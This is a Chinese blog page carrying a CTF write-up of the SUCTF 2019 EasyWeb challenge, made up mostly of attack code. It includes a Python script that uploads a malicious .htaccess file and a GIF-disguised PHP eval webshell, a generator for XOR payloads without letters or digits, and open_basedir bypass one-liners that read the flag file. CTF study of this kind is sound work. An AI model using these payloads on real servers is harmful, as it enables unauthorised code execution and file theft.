当前位置:网站首页>[SUCTF 2019]EasyWeb
[SUCTF 2019]EasyWeb
2022-06-09 02:02:00 【I·CE】
Knowledge point :
AddType application/x-httpd-php .ahhh//http Header addition makes .ahhh As php Script parsing
GIF89a File header spoofing
GIF89a12 12 To make up for 8 Bytes , Satisfy base64 Coding rules
Bypass open_basedir
No numbers, no letters webshell
python Upload script
import requests
import base64
htaccess = b""" #define width 1337 #define height 1337 AddType application/x-httpd-php .ahhh php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh" """
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
url = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
files = {
'file':('.htaccess',htaccess,'image/jpeg')}
data = {
"upload":"Submit"}
response = requests.post(url=url, data=data, files=files)
print(response.text)
files = {
'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
XOR scripts :
function finds($string)
{
$index = 0;
$a = [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255];
for ($i = 27; $i < count($a); $i++) {
for ($j = 27; $j < count($a); $j++) {
$x = $a[$i] ^ $a[$j];
for ($k = 0; $k < strlen($string); $k++) {
if (ord($string[$k]) == $x) {
echo $string[$k] ;
echo '<br/>';
echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j]) ;
echo '<br/>';
$index++;
if ($index == strlen($string)) {
return 0;
}
}
}
}
}
}
finds("phpinfo");
bypass open_basedir
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));
边栏推荐
- Laravel框架中如何使用MongoDB数据库
- Thread synchronization, process synchronization, mutex, semaphore, condition variable, etc
- How to use superset to seamlessly connect with MRS for self-service analysis
- shell 命令输出
- Explication détaillée du nombre de points flottants (une étude approfondie du nombre de points flottants)
- C language student course management system
- C语言借书证管理系统
- 双检锁为什么需要使用volatile关键字
- Hello, people returning to work. Musk has been searching for "workaholics" again. Is telecommuting good or bad?
- Google Chrome uses bookmarks to retrieve bookmarks
猜你喜欢
![[brush through sword finger] sword finger offer II 003 Number of 1 in the first n digit binary](/img/4f/695bc08f4d2d7a2a33f6b13ebb40a8.png)
[brush through sword finger] sword finger offer II 003 Number of 1 in the first n digit binary

Explication détaillée du nombre de points flottants (une étude approfondie du nombre de points flottants)

Detailed explanation of floating point numbers (a thorough study of floating point numbers)

GCD Locks Dead cycle SpinLock synchronized

Official account mall system makes e-commerce easier!

How to use mongodb database in laravel framework

年轻人“新宠”冷泡茶:能否开启下一个“立顿时代”?
![InfoQ geek media's 15th anniversary solicitation | detailed explanation of the architecture of domestic self-developed database gaussdb (DWS) [Gauss database]](/img/42/6490eb0334ed856433e330ccfbaa56.png)
InfoQ geek media's 15th anniversary solicitation | detailed explanation of the architecture of domestic self-developed database gaussdb (DWS) [Gauss database]
![[high level knowledge] epoll implementation principle of user mode protocol stack](/img/bc/f1d8ab69145ff5f644529e292dc5d5.png)
[high level knowledge] epoll implementation principle of user mode protocol stack

MySQL starts the binlog log to recover the erroneously deleted tables, data and MySQL database
随机推荐
shell 比较大小
Shell color output
Shell hardware information
Shell 报告服务器信息
How can golang set its own gopath and import the definition file normally
C language library information management system
Thread synchronization, process synchronization, mutex, semaphore, condition variable, etc
intel 加速云数智变革
Diffusion model has been very popular in the field of image generation recently. How do you think its popularity has begun to surpass Gan?
前迪士尼高管称德普将回归《加勒比海盗》 继续演船长
C language campus supermarket management system
[1037. effective boomerang]
关于#数据库#的问题:请问vba+sql用select * from A where name1 regexp '护',错误提示“操作符丢失”
[azure application service] nodejs express + msal application realizes aad login and obtains accesstoken -- cca acquireTokenByCode(tokenRequest)
二叉树链式结构
Laravel基于MongoDB(LBS)实现附近的人、店铺、房源
About database: vba+sql uses select * from a where name1 regexp to 'protect', and the error prompt is "operator missing"
jenkins根据凭证ID查看忘记的凭证密码以及重置admin密码的操作方法
C语言猜数字游戏
C语言学生课程管理系统